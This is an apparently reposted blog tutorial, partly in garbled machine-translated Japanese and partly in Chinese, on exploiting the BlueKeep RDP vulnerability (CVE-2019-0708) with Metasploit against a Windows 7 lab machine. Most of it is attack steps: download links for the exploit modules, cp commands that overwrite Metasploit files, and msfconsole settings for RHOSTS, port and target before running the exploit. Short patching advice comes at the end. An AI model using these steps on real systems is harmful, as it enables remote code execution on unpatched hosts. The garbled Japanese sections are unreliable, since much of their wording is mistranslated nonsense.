RCEの脆弱性bluekeep(CVE-2019から0708)を使用します

序文

先月、リスクの高い脆弱性EXPのバーストは、トレンドは次を再現従ってください。(¯▽¯)〜*

 

簡単な紹介

Windowsが再びハイリスクのリモート脆弱性CVE-2019から0708までの巨大な破壊力を露呈しました。攻撃者がこの脆弱性を悪用すると、彼らはそうで機密情報へのアクセス、リモートでコードが実行、サービス拒否攻撃を含む、ターゲットシステム上で任意のコードを実行する可能性があります。そして、さらに真剣に、ユーザーの操作なしで、この脆弱性をトリガー、攻撃者は、2017年に匹敵することができますワームは、大規模な普及と破壊を実行するには、この脆弱性を利用しようWannaCry世界を席巻。
 
勢力圏
注:Windows 8とwindows10のバージョン、およびそれ以降この脆弱性の影響を受けます
 
必要条件
3389個のターゲット開いているポートは、ファイアウォールをオフにする(またはファイアウォールポリシーで3389個のリリースポート)
 
環境
時間IP 192.168.10.52
ドローンのWin7のIP 192.168.10.55(ファイアウォールを閉じ、3389開きます)
すべての仮想マシン、使用ブリッジモード
 
1、私たちのMSFを更新
  コマンドラインの実行
  apt-getを更新
  Metasploitのフレームワークをインストールapt-getを
  私はいくつかの誤りがあるが、ここで更新されますが、まだ使用することができます
  

 

2、ダウンロードEXP
  ネットワークディスク:リンク:https://pan.baidu.com/s/1HTk3ehKvZYM0rh4tC0TQLg抽出コード:4dy9
  
  ファイルをダウンロードした後、指定された場所にそれカーリードアを動かします
 
  rdp.rb を/ usr / share / Metasploitのフレームワークに / libに/ MSF /コア/活用ディレクトリ
 
  rdp_scanner.rbcve_2019_0708_bluekeep.rb放到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp 目录
 
  cve_2019_0708_bluekeep_rce.r放进/usr/share/metasploit-framework/modules/exploits/windows/rdp 目录,这里需要注意如果没有rdp这个目录就去创建个。
 
 
  命令(一定要把原先的文件覆盖)
  cp rdp.rb /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb
  cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
   cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
   cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
 
3、更新msf的模块
  先在kali中msfconsole进入metasploit
   在使用reload_all加载复制过去的脚本
   稍等一下即可
 
4、使用模块
search 0708      3是我们用到的模块
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce  使用模块
 
这个exp 目前只有 windwos 7  /2008r2  (我这里用的是win7旗舰版64位)
set RHOSTS 设置IP
set RPORT 设置RDP端口号
使用set target ID设置受害机机器
使用exploit开始攻击,等待建立连接
 
于是
set RHOSTS 192.168.10.55填写受害机
 
set RPORT 3389设置端口(固定)
 
show targets
以为我是虚拟机win7所以这里选三
set target 3
 
然后就exploit或run开始攻击(第一次win7蓝屏,第二次成功)
 
搜集的漏洞检测工具
网盘链接https://pan.baidu.com/s/1ylewLDQPwc4FuxCkm-aQlg    提取码ailu
 
漏洞修复:
  1. 及时打对应系统的安全补丁
  2. 关闭3389端口或添加防火墙安全策略限制对3389端口的访问
  3. 打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击

おすすめ

転載: www.cnblogs.com/lceFIre/p/11628773.html